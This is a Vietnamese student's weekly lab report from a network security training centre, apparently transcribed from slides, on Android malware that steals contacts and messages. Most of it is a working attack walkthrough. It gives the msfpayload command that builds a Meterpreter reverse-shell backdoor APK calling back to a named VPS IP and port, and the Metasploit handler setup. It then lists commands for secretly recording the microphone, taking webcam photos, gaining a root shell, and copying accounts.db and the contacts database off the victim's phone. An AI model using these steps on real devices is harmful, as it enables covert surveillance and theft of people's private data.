Athena tuần 5

13
TRUNG TÂM ĐÀO TẠ O QUN TRMNG & AN NINH MNG QUC T ĐỀ TÀI : NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI BÁO CÁO TUẦN 5 GVHD: VÕ ĐỖ THNG SVTH: TRN THANH THÔNG MSSV: 1120168

Transcript of Athena tuần 5

Page 1: Athena tuần 5

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG

QUỐC TẾ

ĐỀ TÀI :

NGHIÊN CỨU CÁC TROJAN, MALWARE CHO

PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH

CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ

DỤNG ANDROID VÀ GỬI RA NGOÀI

BÁO CÁO TUẦN 5

GVHD: VÕ ĐỖ THẮNG

SVTH: TRẦN THANH THÔNG

MSSV: 1120168

Page 2: Athena tuần 5

TẤN CÔNG MÁY ANDROID TỪ MÁY VPS

1. Tạo ứng dụng chứa mã độc trên Kali Linux:

Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại

Android

Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal .

Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter:

“msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS>

lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>”

Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162

lport=4444 R> /root/Desktop/hack.apk

2. Tấn công điện thoại Android:

Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có

thể mất vài chục phút.

Bước 2: Tiến hành thiết đặt payload bằng các lệnh

“ use exploit/multi/handler ”

“ set payload android/meterpreter/reverse_tcp ”

“ set lhost 14.0.21.162 ”

“ set lport 4444 ”

“ run ”

Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor

ở trên.

Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ

máy Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ

nhận được thông báo như sau:

Page 3: Athena tuần 5

Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác

3. Các phương thức tấn công được sử dụng:

Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân.

3.1 Ghi âm lén:

Sử dụng lệnh: “ record_mic <số giây ghi âm> ”

3.2 Sử dụng camera:

Xem danh sách webcam của thiết bị: “ webcam_list ”

Chụp ảnh lén: “webcam_snap <mã camera>”

Page 4: Athena tuần 5

3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard:

Di chuyển vào thư mục bằng lệnh: cd

Tải về bằng lệnh: download <tên file>

Xóa tập tin bằng lệnh: rm <tên file>

3.4 Truy cập trực tiếp vào hệ thống:

Page 5: Athena tuần 5

Truy cập vào hệ thống bằng lệnh: “shell” > “su”

Kiểm tra máy đã root hay chưa bằng lệnh: “whoami”

Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có

thể tiếp tục tấn công.

3.5 Truy cập và khai thác tài khoản người dùng:

Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –

l”

Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”

Page 6: Athena tuần 5

Trở về meterpreter và tải file accounts.db về:

Page 7: Athena tuần 5

Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db

Page 8: Athena tuần 5

3.6 Truy cập và đánh cắp danh bạ điện thoại:

Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại:

“cd /data/data/com.android.providers.contacts/databases”

Copy về thẻ sdcard và tải về máy

Page 9: Athena tuần 5

Xem nội dung của contacts2.db bằng SQLite Manager

Page 10: Athena tuần 5
Page 11: Athena tuần 5

3.7 Một số câu lệnh khác:

- Để biết thêm về các lệnh có thể thực hiện ta dùng help

- Để xem thông tin về máy, nhập lệnh sysinfo

- Để xem các tác vụ đang chạy gõ ps

- Xem ip của máy bị hack ta gõ ipconfig

- Xem danh sách thư mục, file gõ ls

Page 12: Athena tuần 5

- Để upload gõ lệnh upload

- ls -l danh mục file và các quyền

- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền

/DATA

/DATA/APP

/DATA/SYSTEM

/DATA/SYSTEM/accounts.db

/DATA/SYSTEM/SYNC/accounts.xml

/SYSTEM/APP/

- Để xem danh sách và down load các file hay thay đổi các file trong ROM

Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập

Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename

Ví dụ chmod -R 777 /data

- Ctrl + C để quay lại

Page 13: Athena tuần 5